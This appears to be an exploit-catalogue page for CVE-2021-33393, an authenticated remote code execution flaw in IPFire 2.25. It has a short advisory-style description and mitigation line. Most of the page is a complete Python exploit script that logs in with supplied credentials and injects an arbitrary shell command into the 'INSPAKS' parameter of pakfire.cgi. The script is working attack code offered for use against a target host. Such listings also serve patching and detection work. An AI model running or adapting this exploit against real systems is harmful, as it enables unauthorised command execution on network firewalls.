header-logo
Suggest Exploit
vendor:
IPFire
by:
Mücahit Saratar
8.8
CVSS
HIGH
Remote Code Execution
94
CWE
Product Name: IPFire
Affected Version From: 2.25
Affected Version To: 2.25
Patch Exists: YES
Related CWE: CVE-2021-33393
CPE: 2.25:core_update_156
Metasploit: N/A
Other Scripts: https://www.infosecmatter.com/metasploit-module-library/?mm=exploit/linux/http/ipfire_pakfire_exechttps://www.infosecmatter.com/nessus-plugin-library/?id=33424https://www.infosecmatter.com/nessus-plugin-library/?id=33491https://www.infosecmatter.com/nessus-plugin-library/?id=33571https://www.infosecmatter.com/nessus-plugin-library/?id=33567https://www.infosecmatter.com/nessus-plugin-library/?id=33741https://www.infosecmatter.com/nessus-plugin-library/?id=33400https://www.infosecmatter.com/nessus-plugin-library/?id=33423https://www.infosecmatter.com/nessus-plugin-library/?id=67714https://www.infosecmatter.com/nessus-plugin-library/?id=43702
Platforms Tested: Parrot OS 5.7.0-2parrot2-amd64
2021

IPFire 2.25 – Remote Code Execution (Authenticated)

A vulnerability in IPFire 2.25 allows an authenticated user to execute arbitrary code on the target system. This is due to the lack of proper input validation in the 'pakfire.cgi' script, which allows an attacker to inject malicious code into the 'INSPAKS' parameter. This can be exploited by sending a specially crafted HTTP POST request to the vulnerable script.

Mitigation:

Upgrade to the latest version of IPFire 2.25.
Source

Exploit-DB raw data:

# Exploit Title: IPFire 2.25 - Remote Code Execution (Authenticated)
# Date: 15/05/2021
# Exploit Author: Mücahit Saratar
# Vendor Homepage: https://www.ipfire.org/
# Software Link: https://downloads.ipfire.org/releases/ipfire-2.x/2.25-core156/ipfire-2.25.x86_64-full-core156.iso
# Version: 2.25 - core update 156
# Tested on: parrot os 5.7.0-2parrot2-amd64
# CVE: CVE-2021-33393

#!/usr/bin/python3

import requests as R
import sys
import base64

try:
    host = sys.argv[1]
    assert host[:4] == "http" and host[-1] != "/"
    url = host + "/cgi-bin/pakfire.cgi"
    username = sys.argv[2]
    password = sys.argv[3]
    komut = sys.argv[4]
except:
    print(f"{sys.argv[0]} http://target.com:444 username password command")
    exit(1)

veri = { 
        "INSPAKS": f"7zip;{komut}",
        "ACTION":"install",
        "x": "10",
        "y": "6" }
token = b"Basic " + base64.b64encode(f"{username}:{password}".encode())
header = {"Authorization": token,
        "Connection": "close",
        "Cache-Control": "max-age=0",
        "User-Agent": "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36",
        "Origin": host,
        "Sec-GPC": "1",
        "Sec-Fetch-Site": "same-origin",
        "Sec-Fetch-Mode": "navigate",
        "Sec-Fetch-User": "?1",
        "Sec-Fetch-Dest": "document",
        "Referer": host}


R.post(url, data=veri, headers=header, verify=False)
print("Done.")

Navigation

Suggest Exploit

Services By CQR